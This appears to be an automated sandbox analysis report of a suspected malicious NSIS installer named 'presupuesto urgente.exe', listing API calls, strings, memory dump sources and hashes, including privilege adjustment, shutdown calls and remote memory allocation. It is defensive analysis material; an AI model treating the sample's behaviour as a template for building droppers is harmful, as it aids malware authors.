5863->5859 5864->5859 5865->5859 5866 4029a2 5867 402c15 17 API calls 5866->5867 5868 4029a8 5867->5868 5869 4029e8 5868->5869 5870 4029cf 5868->5870 5877 402885 5868->5877 5872 402a02 5869->5872 5873 4029f2 5869->5873 5871 4029d4 5870->5871 5879 4029e5 5870->5879 5880 4063b0 lstrcpynW 5871->5880 5875 4063d2 17 API calls 5872->5875 5874 402c15 17 API calls 5873->5874 5874->5879 5875->5879 5879->5877 5881 4062f7 wsprintfW 5879->5881 5880->5877 5881->5877 4386 4015a3 4387 402c37 17 API calls 4386->4387 4388 4015aa SetFileAttributesW 
4387->4388 4389 4015bc 4388->4389 5882 4028a7 5883 402c37 17 API calls 5882->5883 5884 4028b5 5883->5884 5885 4028cb 5884->5885 5886 402c37 17 API calls 5884->5886 5887 405e7d 2 API calls 5885->5887 5886->5885 5888 4028d1 5887->5888 5910 405ea2 GetFileAttributesW CreateFileW 5888->5910 5890 4028de 5891 402981 5890->5891 5892 4028ea GlobalAlloc 5890->5892 5895 402989 DeleteFileW 5891->5895 5896 40299c 5891->5896 5893 402903 5892->5893 5894 402978 CloseHandle 5892->5894 5911 403441 SetFilePointer 5893->5911 5894->5891 5895->5896 5898 402909 5899 40342b ReadFile 5898->5899 5900 402912 GlobalAlloc 5899->5900 5901 402922 5900->5901 5902 402956 5900->5902 5904 4031ba 44 API calls 5901->5904 5903 405f54 WriteFile 5902->5903 5905 402962 GlobalFree 5903->5905 5909 40292f 5904->5909 5906 4031ba 44 API calls 5905->5906 5907 402975 5906->5907 5907->5894 5908 40294d GlobalFree 5908->5902 5909->5908 5910->5890 5911->5898 4780 40202c 4781 4020f0 4780->4781 4782 40203e 4780->4782 4784 401423 24 API calls 4781->4784 4783 402c37 17 API calls 4782->4783 4785 402045 4783->4785 4791 40224a 4784->4791 4786 402c37 17 API calls 4785->4786 4787 40204e 4786->4787 4788 402064 LoadLibraryExW 4787->4788 4789 402056 GetModuleHandleW 4787->4789 4788->4781 4790 402075 4788->4790 4789->4788 4789->4790 4803 4067f9 WideCharToMultiByte 4790->4803 4794 402086 4797 4020a5 4794->4797 4798 40208e 4794->4798 4795 4020bf 4796 405414 24 API calls 4795->4796 4799 402096 4796->4799 4806 10001759 4797->4806 4800 401423 24 API calls 4798->4800 4799->4791 4801 4020e2 FreeLibrary 4799->4801 4800->4799 4801->4791 4804 406823 GetProcAddress 4803->4804 4805 402080 4803->4805 4804->4805 4805->4794 4805->4795 4807 10001789 4806->4807 4848 10001b18 4807->4848 4809 10001790 4810 100018a6 4809->4810 4811 100017a1 4809->4811 4812 100017a8 4809->4812 4810->4799 4896 10002286 4811->4896 4880 100022d0 4812->4880 4817 1000180c 4823 10001812 4817->4823 4824 1000184e 4817->4824 4818 100017ee 4909 100024a4 4818->4909 4819 
100017d7 4833 100017cd 4819->4833 4906 10002b57 4819->4906 4820 100017be 4822 100017c4 4820->4822 4828 100017cf 4820->4828 4822->4833 4890 1000289c 4822->4890 4830 100015b4 3 API calls 4823->4830 4826 100024a4 10 API calls 4824->4826 4831 10001840 4826->4831 4827 100017f4 4920 100015b4 4827->4920 4900 10002640 4828->4900 4835 10001828 4830->4835 4847 10001895 4831->4847 4931 10002467 4831->4931 4833->4817 4833->4818 4838 100024a4 10 API calls 4835->4838 4837 100017d5 4837->4833 4838->4831 4840 1000189f GlobalFree 4840->4810 4844 10001881 4844->4847 4935 1000153d wsprintfW 4844->4935 4845 1000187a FreeLibrary 4845->4844 4847->4810 4847->4840 4938 1000121b GlobalAlloc 4848->4938 4850 10001b3c 4939 1000121b GlobalAlloc 4850->4939 4852 10001d7a GlobalFree GlobalFree GlobalFree 4853 10001d97 4852->4853 4859 10001de1 4852->4859 4855 10001dac 4853->4855 4856 100020ee 4853->4856 4853->4859 4854 10001b47 4854->4852 4857 10001c1d GlobalAlloc 4854->4857 4854->4859 4862 10001c68 lstrcpyW 4854->4862 4863 10001c86 GlobalFree 4854->4863 4865 10001c72 lstrcpyW 4854->4865 4870 10002048 4854->4870 4874 10001cc4 4854->4874 4875 10001f37 GlobalFree 4854->4875 4878 1000122c 2 API calls 4854->4878 4945 1000121b GlobalAlloc 4854->4945 4855->4859 4942 1000122c 4855->4942 4858 10002110 GetModuleHandleW 4856->4858 4856->4859 4857->4854 4860 10002121 LoadLibraryW 4858->4860 4861 10002136 4858->4861 4859->4809 4860->4859 4860->4861 4946 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4861->4946 4862->4865 4863->4854 4865->4854 4866 10002148 4867 10002188 4866->4867 4879 10002172 GetProcAddress 4866->4879 4867->4859 4868 10002195 lstrlenW 4867->4868 4947 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4868->4947 4870->4859 4873 10002090 lstrcpyW 4870->4873 4873->4859 4874->4854 4940 1000158f GlobalSize GlobalAlloc 4874->4940 4875->4854 4876 100021af 4876->4859 4878->4854 4879->4867 4887 100022e8 4880->4887 4881 
1000122c GlobalAlloc lstrcpynW 4881->4887 4883 10002410 GlobalFree 4884 100017ae 4883->4884 4883->4887 4884->4819 4884->4820 4884->4833 4885 100023ba GlobalAlloc CLSIDFromString 4885->4883 4886 1000238f GlobalAlloc WideCharToMultiByte 4886->4883 4887->4881 4887->4883 4887->4885 4887->4886 4889 100023d9 4887->4889 4949 100012ba 4887->4949 4889->4883 4953 100025d4 4889->4953 4892 100028ae 4890->4892 4891 10002953 VirtualAllocEx 4893 10002971 4891->4893 4892->4891 4894 10002a62 GetLastError 4893->4894 4895 10002a6d 4893->4895 4894->4895 4895->4833 4897 10002296 4896->4897 4898 100017a7 4896->4898 4897->4898 4899 100022a8 GlobalAlloc 4897->4899 4898->4812 4899->4897 4904 1000265c 4900->4904 4901 100026c0 4903 100026c5 GlobalSize 4901->4903 4905 100026cf 4901->4905 4902 100026ad GlobalAlloc 4902->4905 4903->4905 4904->4901 4904->4902 4905->4837 4908 10002b62 4906->4908 4907 10002ba2 GlobalFree 4908->4907 4956 1000121b GlobalAlloc 4909->4956 4911 10002506 MultiByteToWideChar 4916 100024ae 4911->4916 4912 1000252b StringFromGUID2 4912->4916 4913 1000253c lstrcpynW 4913->4916 4914 1000256c GlobalFree 4914->4916 4915 1000254f wsprintfW 4915->4916 4916->4911 4916->4912 4916->4913 4916->4914 4916->4915 4917 100025a7 GlobalFree 4916->4917 4918 10001272 2 API calls 4916->4918 4957 100012e1 4916->4957 4917->4827 4918->4916 4961 1000121b GlobalAlloc 4920->4961 4922 100015ba 4923 100015c7 lstrcpyW 4922->4923 4925 100015e1 4922->4925 4926 100015fb 4923->4926 4925->4926 4927 100015e6 wsprintfW 4925->4927 4928 10001272 4926->4928 4927->4926 4929 100012b5 GlobalFree 4928->4929 4930 1000127b GlobalAlloc lstrcpynW 4928->4930 4929->4831 4930->4929 4932 10002475 4931->4932 4934 10001861 4931->4934 4933 10002491 GlobalFree 4932->4933 4932->4934 4933->4932 4934->4844 4934->4845 4936 10001272 2 API calls 4935->4936 4937 1000155e 4936->4937 4937->4847 4938->4850 4939->4854 4941 100015ad 4940->4941 4941->4874 4948 1000121b GlobalAlloc 4942->4948 4944 1000123b lstrcpynW 4944->4859 4945->4854 
4946->4866 4947->4876 4948->4944 4950 100012c1 4949->4950 4951 1000122c 2 API calls 4950->4951 4952 100012df 4951->4952 4952->4887 4954 100025e2 VirtualAlloc 4953->4954 4955 10002638 4953->4955 4954->4955 4955->4889 4956->4916 4958 100012ea 4957->4958 4959 1000130c 4957->4959 4958->4959 4960 100012f0 lstrcpyW 4958->4960 4959->4916 4960->4959 4961->4922 5919 402a2f 5920 402c15 17 API calls 5919->5920 5921 402a35 5920->5921 5922 402a6c 5921->5922 5924 402885 5921->5924 5925 402a47 5921->5925 5923 4063d2 17 API calls 5922->5923 5922->5924 5923->5924 5925->5924 5927 4062f7 wsprintfW 5925->5927 5927->5924 5928 401a30 5929 402c37 17 API calls 5928->5929 5930 401a39 ExpandEnvironmentStringsW 5929->5930 5931 401a4d 5930->5931 5933 401a60 5930->5933 5932 401a52 lstrcmpW 5931->5932 5931->5933 5932->5933 5939 401db3 GetDC 5940 402c15 17 API calls 5939->5940 5941 401dc5 GetDeviceCaps MulDiv ReleaseDC 5940->5941 5942 402c15 17 API calls 5941->5942 5943 401df6 5942->5943 5944 4063d2 17 API calls 5943->5944 5945 401e33 CreateFontIndirectW 5944->5945 5946 40258c 5945->5946 5947 402835 5948 40283d 5947->5948 5949 402841 FindNextFileW 5948->5949 5950 402853 5948->5950 5949->5950 5951 4029e0 5950->5951 5953 4063b0 lstrcpynW 5950->5953 5953->5951 5954 401735 5955 402c37 17 API calls 5954->5955 5956 40173c SearchPathW 5955->5956 5957 4029e0 5956->5957 5958 401757 5956->5958 5958->5957 5960 4063b0 lstrcpynW 5958->5960 5960->5957 5961 10002a77 5962 10002a8f 5961->5962 5963 1000158f 2 API calls 5962->5963 5964 10002aaa 5963->5964 5965 4014b8 5966 4014be 5965->5966 5967 401389 2 API calls 5966->5967 5968 4014c6 5967->5968 5969 406aba 5973 40693e 5969->5973 5970 4072a9 5971 4069c8 GlobalAlloc 5971->5970 5971->5973 5972 4069bf GlobalFree 5972->5971 5973->5970 5973->5971 5973->5972 5974 406a36 GlobalFree 5973->5974 5975 406a3f GlobalAlloc 5973->5975 5974->5975 5975->5970 5975->5973

                                                                                                                                                      Control-flow Graph

[Figure: control-flow graph of the function starting at 403489, nodes marked Executed / Not Executed; first node 403489-4034c6 calls SetErrorMode and GetVersion.]
                                                                                                                                                      APIs
                                                                                                                                                      • SetErrorMode.KERNELBASE ref: 004034AC
                                                                                                                                                      • GetVersion.KERNEL32 ref: 004034B2
                                                                                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E5
                                                                                                                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403522
                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 00403529
                                                                                                                                                      • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403545
                                                                                                                                                      • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 0040355A
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\presupuesto urgente.exe",00000000,?,00000006,00000008,0000000A), ref: 0040356D
                                                                                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\presupuesto urgente.exe",00000020,?,00000006,00000008,0000000A), ref: 00403594
                                                                                                                                                        • Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                                                                                                                        • Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                                                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036CE
                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036DF
                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004036EB
                                                                                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004036FF
                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403707
                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403718
                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403720
                                                                                                                                                      • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403734
                                                                                                                                                        • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                                                                                                                      • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004037FF
                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403820
                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\presupuesto urgente.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403833
                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\presupuesto urgente.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403842
                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\presupuesto urgente.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\presupuesto urgente.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403859
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403875
                                                                                                                                                      • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038CF
                                                                                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\presupuesto urgente.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038E3
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 00403910
                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040393F
                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403946
                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040395B
                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 0040397E
                                                                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004039A3
                                                                                                                                                      • ExitProcess.KERNEL32 ref: 004039C6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                      • String ID: "C:\Users\user\Desktop\presupuesto urgente.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet$C:\Users\user\Desktop$C:\Users\user\Desktop\presupuesto urgente.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                      • API String ID: 2488574733-3239275121
                                                                                                                                                      • Opcode ID: 0c5ed391fea6fa0d6bec001cb8bac7c1b86e8aed39806b07c52da4fce73069a4
                                                                                                                                                      • Instruction ID: aa49a9b5ba718b736b7abce3970f6df4d0a927ceef10040f9259c4205047f8e0
                                                                                                                                                      • Opcode Fuzzy Hash: 0c5ed391fea6fa0d6bec001cb8bac7c1b86e8aed39806b07c52da4fce73069a4
                                                                                                                                                      • Instruction Fuzzy Hash: 3DD103B1600311ABD3206F759D45B3B3AACEB4070AF10443FF981B62D2DBBD8D558A6E

                                                                                                                                                      Control-flow Graph

[Figure: control-flow graph of the function starting at 402f14, nodes marked Executed / Not Executed; first node 402f14-402f62 calls GetTickCount, GetModuleFileNameW and subfunction 405ea2.]
                                                                                                                                                      APIs
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402F28
                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\presupuesto urgente.exe,00000400), ref: 00402F44
                                                                                                                                                        • Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\presupuesto urgente.exe,80000000,00000003), ref: 00405EA6
                                                                                                                                                        • Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8
                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\presupuesto urgente.exe,C:\Users\user\Desktop\presupuesto urgente.exe,80000000,00000003), ref: 00402F8D
                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030D4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                      • String ID: "C:\Users\user\Desktop\presupuesto urgente.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\presupuesto urgente.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                      • API String ID: 2803837635-3997448147
                                                                                                                                                      • Opcode ID: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
                                                                                                                                                      • Instruction ID: 409c8f22eebac3ceeba7cf51205c68f93d68dba00e9ec32c8e3ebc1c19b8881b
                                                                                                                                                      • Opcode Fuzzy Hash: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
                                                                                                                                                      • Instruction Fuzzy Hash: 8D61E031A00204ABDB20EF65DD85A9A7BA8EB04355F20817FF901F72D0C77C9A418BAD
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                                                                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8114030407.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.8113998987.0000000010000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.8114063244.0000000010003000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.8114087670.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4227406936-0
                                                                                                                                                      • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                                                                                                                      • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                                                                      • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                                                                                                                      • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      APIs
                                                                                                                                                      • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76892EE0,00000000), ref: 00405AE7
                                                                                                                                                      • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76892EE0,00000000), ref: 00405B2F
                                                                                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76892EE0,00000000), ref: 00405B52
                                                                                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76892EE0,00000000), ref: 00405B58
                                                                                                                                                      • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76892EE0,00000000), ref: 00405B68
                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C08
                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00405C17
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                      • String ID: "C:\Users\user\Desktop\presupuesto urgente.exe"$0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                      • API String ID: 2035342205-2554713587
                                                                                                                                                      • Opcode ID: 6a659da8d5721ce07b89c17eb76fa4599111a2d920b673130fc03b7c63125bad
                                                                                                                                                      • Instruction ID: 07f17dd178ac6d8b62b8dc139a3c49ba2dacd8a3a96bf447fe2624e5f5ce8b98
                                                                                                                                                      • Opcode Fuzzy Hash: 6a659da8d5721ce07b89c17eb76fa4599111a2d920b673130fc03b7c63125bad
                                                                                                                                                      • Instruction Fuzzy Hash: 1741D030904A18A6DB21AB618D89FBF7678EF42719F50813BF801B11D1D77C5982DEAE

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
                                                                                                                                                      • Instruction ID: 906bff5cfe4bf8fc25f5c52b70697fc94252e662920e9b50785524ea690ef068
                                                                                                                                                      • Opcode Fuzzy Hash: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
                                                                                                                                                      • Instruction Fuzzy Hash: EBF17870D04229CBDF18CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45
                                                                                                                                                      APIs
                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405DD2,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76892EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76892EE0), ref: 004066FE
                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 0040670A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                      • String ID: xgB
                                                                                                                                                      • API String ID: 2295610775-399326502
                                                                                                                                                      • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                                                      • Instruction ID: 551d457f2096baf6d1028c2489454c6ec1272a262abf728b5c7319079dd029a3
                                                                                                                                                      • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                                                      • Instruction Fuzzy Hash: DBD012315090209BC201173CBE4C85B7A989F953397128B37B466F71E0C7348C638AE8

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                                                                                                                        • Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                                                                                                                      • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76893420,"C:\Users\user\Desktop\presupuesto urgente.exe",00000000), ref: 00403B3F
                                                                                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BBF
                                                                                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BD2
                                                                                                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403BDD
                                                                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet), ref: 00403C26
                                                                                                                                                        • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                                                                                                                      • RegisterClassW.USER32(004291E0), ref: 00403C63
                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7B
                                                                                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CB0
                                                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403CE6
                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D12
